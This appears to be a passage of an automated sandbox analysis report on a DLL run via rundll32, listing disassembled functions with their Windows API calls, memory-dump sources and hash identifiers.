                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Brush
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2798902688-0
                                                                                                                                    • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                                    • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                                    • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                                    • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002981B Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                                      • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                                      • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                      • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                                      • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                                      • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 63617653-0
                                                                                                                                    • Opcode ID: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                                    • Instruction ID: 8f7f5911e4d3fd52506e0ebb541b856e7b36a578254e0be009e80c36fe1d785e
                                                                                                                                    • Opcode Fuzzy Hash: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                                    • Instruction Fuzzy Hash: 13F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002D1E9 Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                                    • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                                      • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                                    • _memset.LIBCMT ref: 1002D2F2
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4021759052-0
                                                                                                                                    • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                                    • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                                    • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                                    • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002D5D0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 1002D5FF
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                                      • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocString$H_prolog3_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 842698744-0
                                                                                                                                    • Opcode ID: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                                    • Instruction ID: 4ca028c9b4d427f08f2d669533113988f62624cee2fc7606aac8abf48e723189
                                                                                                                                    • Opcode Fuzzy Hash: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                                    • Instruction Fuzzy Hash: E9414A34900304CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100169E1 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                                      • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                                      • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                                      • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                                    • SendMessageA.USER32 ref: 10016A5B
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1877664794-0
                                                                                                                                    • Opcode ID: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                                    • Instruction ID: f13ef48dc5fb0c484cec2fa7b3f992f2dc6d3b1b42596072abe369902371925a
                                                                                                                                    • Opcode Fuzzy Hash: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                                    • Instruction Fuzzy Hash: 3B415B72A00258DBEB20CFA4CC81BDD76A8EF09350F614119E949AB281E770D9848F52
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10016936 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                                    • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                                    • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                                    • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                                    • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                                    • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 670545878-0
                                                                                                                                    • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                                    • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                                    • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                                    • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10020559 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                                    • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                                    • GetWindowRect.USER32 ref: 1002059C
                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1315500227-0
                                                                                                                                    • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                                    • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                                    • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                                    • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001D992 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset
                                                                                                                                    • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                                    • API String ID: 2102423945-4122032997
                                                                                                                                    • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                                    • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                                    • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                                    • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10021D88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                                    • String ID: System
                                                                                                                                    • API String ID: 1529587224-3470857405
                                                                                                                                    • Opcode ID: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                                    • Instruction ID: 0e81d0f59cd66082c3aa20aff96d3ec22f48ed16ea157d431ad3d5bc96dc32b7
                                                                                                                                    • Opcode Fuzzy Hash: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                                    • Instruction Fuzzy Hash: B441C275900215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100233C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                                    • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                                    • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                                    • API String ID: 2418878492-2500072749
                                                                                                                                    • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                                    • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                                    • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                                    • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10015723 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                                    • _memset.LIBCMT ref: 1001579D
                                                                                                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                                    • LoadBitmapA.USER32 ref: 10015807
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4271682439-3916222277
                                                                                                                                    • Opcode ID: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                                    • Instruction ID: fd313e63bbbbf4de8925541e866d87c57cd6a5f11e69b9eb671f3de319ba3105
                                                                                                                                    • Opcode Fuzzy Hash: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                                    • Instruction Fuzzy Hash: 2831C072A00216DFEB10CF78DDCAAAE7BB5EB44645F15052AE506EF2C1E631E9448750
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10023B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                                    • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                                    • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2429671754-3916222277
                                                                                                                                    • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                                    • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                                    • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                                    • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10018D05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: System$Metrics$InfoParameters
                                                                                                                                    • String ID: B$DISPLAY
                                                                                                                                    • API String ID: 3136151823-3316187204
                                                                                                                                    • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                                    • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                                    • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                                    • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10016D6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
